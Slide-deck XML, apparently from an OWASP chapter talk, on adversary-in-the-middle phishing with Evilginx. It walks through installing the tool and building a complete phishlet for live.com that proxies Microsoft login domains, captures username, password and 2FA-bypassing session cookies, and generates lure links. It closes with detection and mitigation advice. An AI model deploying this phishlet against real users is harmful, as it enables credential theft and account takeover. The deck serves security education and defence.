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7772400" cy="10058400"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId37"/>
      <p:bold r:id="rId38"/>
      <p:italic r:id="rId39"/>
      <p:boldItalic r:id="rId40"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Courier Prim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hzm1/u+I9t1P7CodFknAGQWXNv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CourierPrime-bold.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CourierPrime-regular.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CourierPrime-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CourierPrime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402910282_0_1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22402910282_0_1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402910282_0_148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22402910282_0_148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402910282_0_152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22402910282_0_152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402910282_0_154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22402910282_0_154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402910282_0_149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22402910282_0_149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402910282_0_154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22402910282_0_154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402910282_0_155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22402910282_0_155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402910282_0_156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22402910282_0_156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5f850c85c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245f850c85c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5b02e094c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245b02e094c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5f850c85c_0_4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g245f850c85c_0_4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5f850c85c_0_5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245f850c85c_0_5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5b02e094c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245b02e094c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5f850c85c_0_2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245f850c85c_0_2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5f850c85c_0_3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g245f850c85c_0_3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402910282_0_147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22402910282_0_147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402910282_0_153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22402910282_0_153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402910282_0_158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g22402910282_0_158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402910282_0_15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g22402910282_0_15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402910282_0_150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22402910282_0_150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b618f386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geb618f3862_0_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Please choose an upcoming AppSec Global, and any local regional or chapter events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2bef3c2ac_0_3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32bef3c2ac_0_3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402910282_0_2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2402910282_0_2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402910282_0_98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2402910282_0_98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402910282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Version 2 was thrown over the wall and researchers were left to figure out how to use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Version 3 came out as a result of the community response received from version 2.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is now paid training on phishlet development, and a paid version of Evilginx with additional features. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;g22402910282_0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402910282_0_1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2402910282_0_1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9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9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0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26160" y="2213640"/>
            <a:ext cx="7939800" cy="2430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9726120" y="3819240"/>
            <a:ext cx="822600" cy="65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0" y="5653440"/>
            <a:ext cx="12191760" cy="122832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80600" y="6015240"/>
            <a:ext cx="1649160" cy="5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009640" y="6036840"/>
            <a:ext cx="38944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14560" y="6298560"/>
            <a:ext cx="403920" cy="1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152760"/>
            <a:ext cx="12191760" cy="704880"/>
            <a:chOff x="0" y="6152760"/>
            <a:chExt cx="12191760" cy="70488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152760"/>
              <a:ext cx="12191760" cy="70488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38080" y="6311880"/>
              <a:ext cx="35992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254160" y="6283080"/>
            <a:ext cx="11581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cademy.breakdev.org/evilginx-mastery" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academy.breakdev.org/evilginx-mastery" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kgretzky" TargetMode="External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6XpOc3mL5IfhS_swe5wlJUa7hD7A173R/view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hrome.google.com/webstore/detail/cookie-editor/hlkenndednhfkekhgcdicdfddnkalmdm" TargetMode="External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https://github.com/An0nUD4Y/Evilginx2-Phishlets/blob/master/microsoft.yaml" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/d0n601/Evilginx3-Phishlet-Playgroun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1aAIySxYOe_YGamYXLF0FUlfGoYmWRl6/view" TargetMode="External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rt.sh/?q=blackhatmail.liv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ecuritee.org/files/transparent-phish_ccs2021.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fin3ss3g0d/evilgophish" TargetMode="External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help.evilginx.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://breakdev.org/evilginx-3-0-evilginx-mastery/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/An0nUD4Y/Evilginx2-Phishlets" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kgretzky/evilginx2" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/d0n601/Evilginx3-Phishlet-Playground" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aalex954/evilginx2-tuned" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/optiv/evilginx2/commit/0459f36cd9f142b5b1113d1c26cb1cc1434e34c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joubin.jabbari@owasp.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ryan.kozak@owasp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gretzky/evilginx2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attack.mitre.org/techniques/T1528/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/" TargetMode="External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hyperlink" Target="https://en.wikipedia.org/wiki/AOHell" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/AOHell" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-reference/phishing" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-reference/phishing" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.phishing.org/history-of-phish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kgretzky/evilginx2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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3844475" y="5085925"/>
            <a:ext cx="5766600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Meeting Starts at 7:05PM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meantime, checkout https://granitecity.io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402910282_0_17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Example Attack Flow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3" name="Google Shape;273;g2240291028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325" y="72950"/>
            <a:ext cx="9597423" cy="62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402910282_0_1485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Basic Setup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No IOC Removal, no proxy configuration, not part of another toolkit, etc.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2402910282_0_1485"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="3643400"/>
            <a:ext cx="79929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Install D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ependencies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AutoNum type="alphaLcPeriod"/>
            </a:pP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sudo apt install net-tools golang-go make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Clone the repository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AutoNum type="alphaLcPeriod"/>
            </a:pP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git clone https://github.com/kgretzky/evilginx2.git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0" name="Google Shape;280;g22402910282_0_1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75" y="1460225"/>
            <a:ext cx="6921900" cy="19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2402910282_0_1485"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067550" y="1460225"/>
            <a:ext cx="396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Demo Server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Digital Ocean Ubuntu 22.10 VPS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$6/month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402910282_0_1523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Basic Setup Cont.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No IOC Removal, no proxy configuration, not part of another toolkit, etc.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2402910282_0_1523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88875" y="1056300"/>
            <a:ext cx="7836600" cy="47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Configure DNS (free up port 53)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AutoNum type="alphaLcPeriod"/>
            </a:pP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sudo systemctl stop systemd-resolved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AutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modify</a:t>
            </a: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 /etc/systemd/resolved.conf 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/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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DNS=8.8.8.8 # or whomever else</a:t>
            </a:r>
            <a:endParaRPr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/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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DNSStubListener=no #make sure line uncommented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AutoNum type="alphaLcPeriod"/>
            </a:pP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sudo systemctl start systemd-resolved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Set @ record and name servers as seen in images.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Evilginx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AutoNum type="alphaLcPeriod"/>
            </a:pP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cd ./evilginx2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AutoNum type="alphaLcPeriod"/>
            </a:pP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make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AutoNum type="alphaLcPeriod"/>
            </a:pP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mv ./build/evilginx ../ </a:t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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Install is over at this point, and you need a phishlet to use…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8" name="Google Shape;288;g22402910282_0_1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2402910282_0_15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250" y="2959250"/>
            <a:ext cx="3961725" cy="2842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2402910282_0_15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3250" y="1730325"/>
            <a:ext cx="3961725" cy="107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402910282_0_1543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Phishlet Philosophy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22402910282_0_1543"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="902350"/>
            <a:ext cx="56523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My main goal has always been to deliver a reverse proxy phishing framework for red teamers. The provided example phishlets were always meant to serve as a learning material to learn how to make your own phishlets. Keeping them updated, was honestly an impossible feat…</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="14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Phishlets get outdated and stop working relatively fast and I always wanted to focus on developing the framework, rather then keeping the example phishlets constantly up-to-date. I encourage everyone to set up their own repositories with phishlets they want to share with the community. My priority now is to put effort into teaching people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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how to create their own phishlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1400"/>
              <a:t> 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/>
              <a:t>-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kgretzky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97" name="Google Shape;297;g22402910282_0_15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2402910282_0_1543"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050225" y="2160800"/>
            <a:ext cx="4660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Important Notes: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author’s course is $433.40, while fair this is a barrier for many.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Free information on phishlet development is generally still very limited.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Phishlets for popular sites/apps are often sold privately rather than published online.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402910282_0_1494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Phishlet Format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22402910282_0_1494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648800" y="1817150"/>
            <a:ext cx="87408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proxy_hosts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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proxy_hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameter indicates which domains and subdomains that Evilginx will proxy between the real server and end user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phish_sub:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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phish_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameter indicates which subdomain to be used for the phishing hostname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sub_filters:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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sub_filters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameter is used to indicate the string substitution filters for dynamic content being proxied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auth_tokens:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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auth_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> indicates which cookies are to be captured in the proxied response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credentials:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameter indicates the parameters should be captured in the POST requests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auth_urls:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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auth_urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameter specifies a URL that should be available once a user is fully authenticated which would indicate the authentication is complete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login:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameter indicates where the location of the phishing landing page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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js_inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: This section defines all Javascript scripts that you want to inject into proxied pages.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr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05" name="Google Shape;305;g22402910282_0_14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402910282_0_1549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Creating a Phishlet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11" name="Google Shape;311;g22402910282_0_15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22402910282_0_1549"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="1074000"/>
            <a:ext cx="6393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concept creating a phishlet is simple. Proxy the traffic during the login process with a tool such as BurpSuite or OWASP ZAP, determine the requests made, and create the appropriate phishlet as per Evilginx’s documentation…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practice this can be quite difficult depending on the complexity of the application you’re writing a phishlet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steps are roughly this.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Determine all relevant subdomains and include them under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier Prime"/>
                <a:ea typeface="Courier Prime"/>
                <a:cs typeface="Courier Prime"/>
                <a:sym typeface="Courier Prime"/>
              </a:rPr>
              <a:t>proxy_hosts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Add @ records to your registrar to proxy subdomains determined in the previous step.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Implement logic to parse for auth_tokens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Add auth_urls if auth_tokens are gathered through generic regular expressions.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Implement logic to parse credentials from POST request.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Add force post for “keep me signed in” (probably).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Add login domain and path parameters.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Bang head if additional protection mechanisms exist, and iterate the steps above.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Profit.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="Google Shape;313;g22402910282_0_15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675" y="1756575"/>
            <a:ext cx="4655526" cy="356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2402910282_0_1556" title="simplescreenrecorder-2023-05-16_12.55.58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800" y="1"/>
            <a:ext cx="8199475" cy="6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402910282_0_1563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Creating a Phishlet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4" name="Google Shape;324;g22402910282_0_15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2402910282_0_15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75" y="966675"/>
            <a:ext cx="8994780" cy="5012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2402910282_0_1563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9376450" y="1807200"/>
            <a:ext cx="2677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BurpSuite results for live.com’s login flow.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Relevant domains in order of appearance.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login.live.com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logincdn.msauth.net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account.live.com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account.microsoft.com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login.microsoftonline.com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www.microsoft.com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5f850c85c_0_0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Creating a Phishlet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2" name="Google Shape;332;g245f850c85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245f850c85c_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254500" y="1072525"/>
            <a:ext cx="117363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Once we’ve captured the login flow, we can analyze it and create </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>proxy_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> entries for the list of relevant subdomains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discovered. By including the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>auto_filter: true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>flag, we can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>hopefully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> avoid defining many additional </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>sub_filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>manually (version 3 FTW!)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author: '@d0n601'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min_ver: '3.0.0'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proxy_hosts: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'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true, auto_filter: true}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'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false, auto_filter: true}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'account', orig_sub: 'account', domain: 'live.com', session: true, is_landing: false, auto_filter: true}  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'microsoft', orig_sub: 'account', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true}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'login.microsoftonline', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true}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'www', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true}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5b02e094c_0_0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Creating a Phishlet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9" name="Google Shape;339;g245b02e09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45b02e094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75" y="977075"/>
            <a:ext cx="8724626" cy="485315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245b02e094c_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9474675" y="1977425"/>
            <a:ext cx="257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@ records for the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>phish_sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>entries seen in the previous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subdomains of the phishlet’s host.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/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Sacramento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984240" y="3429000"/>
            <a:ext cx="10223280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5f850c85c_0_46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Creating a Phishlet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245f850c85c_0_46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411675" y="1288625"/>
            <a:ext cx="6083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order to complete the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>auth_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> entries, I’d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>recommend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> exporting the cookies of a successful login session using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browser plugin such as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cookie editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. You can then define each one by name, or use a regular expression to catch dynamically generated values.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case of live.com, through trial and error we can determine the only two cookies we need to bypass 2-FA are the following.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auth_tokens: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domain: '.login.live.com'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	keys: ['SDIDC','JSHP']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	type: 'cookie'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348" name="Google Shape;348;g245f850c85c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4851" y="722300"/>
            <a:ext cx="5054001" cy="428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45f850c85c_0_46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6927575" y="5120375"/>
            <a:ext cx="50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JSON dump of cookies for live.com…look at what we need and catch them.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5f850c85c_0_55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Creating a Phishlet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245f850c85c_0_55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411675" y="1288625"/>
            <a:ext cx="38772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order to complete the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>entries, we can find the POST request containing our creds, and create queries for the username and password variables we see passed to the service.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credentials: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 username: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	key: 'login'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	search: '(.*)'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	type: 'post'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 password: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	key: 'passwd'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	search: '(.*)'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	type: 'post'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:highlight>
                  <a:schemeClr val="lt2"/>
                </a:highlight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356" name="Google Shape;356;g245f850c85c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125" y="1642050"/>
            <a:ext cx="7569699" cy="34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5b02e094c_0_6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Creating a Phishlet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2" name="Google Shape;362;g245b02e094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45b02e094c_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720275" y="955975"/>
            <a:ext cx="111462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Putting all the pieces together, our new phishlet for live.com will look like this,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author: '@d0n601'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min_ver: '3.0.0'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proxy_hosts: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'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true, auto_filter: true}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'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false, auto_filter: true}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'account', orig_sub: 'account', domain: 'live.com', session: true, is_landing: false, auto_filter: true}  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'microsoft', orig_sub: 'account', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true}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'login.microsoftonline', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true}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{phish_sub: 'www', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true}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auth_tokens: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domain: '.login.live.com'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keys: ['SDIDC','JSHP']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type: 'cookie'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credentials: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username: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key: 'login'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search: '(.*)'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type: 'post'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password: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key: 'passwd'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search: '(.*)'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type: 'post'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force_post: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- path: '/ppsecure/post.srf'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search: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	- {key: 'login', search: '.*'}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	- {key: 'passwd', search: '.*'}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force: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	- {key: 'KMSI', value: 'on'}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	type: 'post'    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login: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domain: 'login.live.com'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CCCCCC"/>
                </a:highlight>
                <a:latin typeface="Courier Prime"/>
                <a:ea typeface="Courier Prime"/>
                <a:cs typeface="Courier Prime"/>
                <a:sym typeface="Courier Prime"/>
              </a:rPr>
              <a:t>  path: 'login.srf'</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight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64" name="Google Shape;364;g245b02e094c_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439400" y="3568550"/>
            <a:ext cx="66984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Save this under the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>evilginx2/phishlets/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>directory. In this example we’ll call it </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>owasp2.yaml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Version 3 allows a phishlet to be created in 33 lines. In version two a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similar phishlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>took 101 lines. Many of these are subfilters.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https://github.com/d0n601/Evilginx3-Phishlet-Playground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5f850c85c_0_27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Creating a Phishlet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70" name="Google Shape;370;g245f850c85c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245f850c85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0" y="1032200"/>
            <a:ext cx="8887196" cy="50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245f850c85c_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9567725" y="3013350"/>
            <a:ext cx="235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the hostname of the phishlet, and then enable it.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5f850c85c_0_37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Creating a Phishlet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78" name="Google Shape;378;g245f850c85c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45f850c85c_0_37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8094475" y="2921700"/>
            <a:ext cx="235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lure to use with the phishlet, give it a proper redirect_url to go to, and then get the phishing link.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="380" name="Google Shape;380;g245f850c85c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25" y="1202425"/>
            <a:ext cx="6441250" cy="33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45f850c85c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25" y="4789225"/>
            <a:ext cx="36957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402910282_0_1475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Modern Phishing with Evilginx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g22402910282_0_1475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4305750" y="4566200"/>
            <a:ext cx="35805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DEMO</a:t>
            </a:r>
            <a:endParaRPr b="1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88" name="Google Shape;388;g22402910282_0_1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2488" y="1541100"/>
            <a:ext cx="4986476" cy="27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g22402910282_0_1535" title="owasp_demo-2023-05-17_08.36.1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450" y="-1"/>
            <a:ext cx="9058625" cy="61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2402910282_0_1580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Modern Phishing with Evilginx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99" name="Google Shape;399;g22402910282_0_1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425" y="216000"/>
            <a:ext cx="61150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22402910282_0_15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50" y="2216025"/>
            <a:ext cx="7572526" cy="35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402910282_0_1510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Mitigations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22402910282_0_1510"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491075" y="981200"/>
            <a:ext cx="4343100" cy="44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Detections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400"/>
              <a:t>Certificate transparency can reveal phishing subdomains pretty clearly, as seen here.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https://crt.sh/?q=blackhatmail.live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X-Evilginx HTTP header (if not removed)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400"/>
              <a:t>IOC’s present in Evilginx2, not sure if or where they’re at in Evilginx3 yet.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Mitigations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Passwordless options (certificate-based auth, Hello For Business, etc), FIDO2 security keys.</a:t>
            </a:r>
            <a:endParaRPr sz="14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407" name="Google Shape;407;g22402910282_0_15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2402910282_0_15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525" y="1748700"/>
            <a:ext cx="7109351" cy="36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402910282_0_1500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Evilginx: Further Reading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g22402910282_0_1500"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="1033075"/>
            <a:ext cx="83886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Evilginx Documentation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3.0 Release Blog Post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Evilginx3 on GitHub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Phishlet Repo for this presentation.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Evilginx2 with IOC’s Removed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Evilginx2 with IOC’s Removed again, commit diff helps visualise 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9"/>
              </a:rPr>
              <a:t>An0nUD4Y’s Evilginx2 Phishlet repository</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (archived as of this week)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10"/>
              </a:rPr>
              <a:t>EvilGoPhish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> a phishing toolkit which includes Evilginx2, among other things.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11"/>
              </a:rPr>
              <a:t>Catching Transparent Phish: Analyzing and Detecting MITM Phishing Toolkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415" name="Google Shape;415;g22402910282_0_150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676026" y="1319050"/>
            <a:ext cx="90534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Food &amp; Drinks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topics……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Modern Phishing with Evilginx2/3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b618f3862_0_0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Community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eb618f3862_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627825" y="1461700"/>
